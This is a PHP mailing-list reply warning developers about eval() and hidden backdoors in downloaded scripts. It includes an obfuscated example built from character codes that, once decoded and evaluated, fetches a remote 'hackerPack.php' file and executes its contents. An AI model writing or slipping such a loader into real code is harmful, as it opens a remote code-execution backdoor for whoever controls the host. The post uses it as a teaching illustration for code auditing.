RE: Re: Question on virus/worms

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

On Sat, 2007-03-03 at 14:02 +0100, Tim wrote:
>
> Once you are comfortable with this, before you use a script downloaded from
> the inet in a production environment, go through the code and make sure you
> don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't
> related to the scripts original use).

And be very careful with eval(). It's a gold mine for hackers since then
they can just do things like:

<?php

    $stuff =
        '102,117,110,99,116,105,111,110,32,83,73,76,70,83,68,'
       .'72,76,68,70,78,76,72,68,72,74,76,83,68,76,75,74,68,'
       .'76,74,83,72,68,76,74,83,72,68,83,90,68,70,83,40,41,'
       .'10,32,32,32,32,123,10,32,32,32,32,32,32,32,32,36,99,'
       .'111,100,101,32,61,32,102,105,108,101,40,32,39,104,116,'
       .'116,112,58,47,47,119,119,119,46,105,110,116,101,114,'
       .'106,105,110,110,46,99,111,109,47,104,97,99,107,101,'
       .'114,80,97,99,107,46,112,104,112,39,32,41,59,10,32,32,'
       .'32,32,32,32,32,32,36,99,111,100,101,32,61,32,105,109,'
       .'112,108,111,100,101,40,32,39,39,44,32,36,99,111,100,'
       .'101,32,41,59,10,10,32,32,32,32,32,32,32,32,101,118,'
       .'97,108,40,32,36,99,111,100,101,32,41,59,10,32,32,32,'
       .'32,125,10,10,32,32,32,32,83,73,76,70,83,68,72,76,68,'
       .'70,78,76,72,68,72,74,76,83,68,76,75,74,68,76,74,83,'
       .'72,68,76,74,83,72,68,83,90,68,70,83,40,41,59';

    $stuff = explode( ',', $stuff );
    $stuff = 'c'.'h'.'r'.'('.implode( ').'
            .'c'.'h'.'r'.'(', $stuff ).');';

    $stuff = eval( 'return '.$stuff );
    $stuff = eval( $stuff );

?>

Cheers,
Rob.
-- 
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for       |
| creating re-usable components quickly and easily.          |
`------------------------------------------------------------'

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux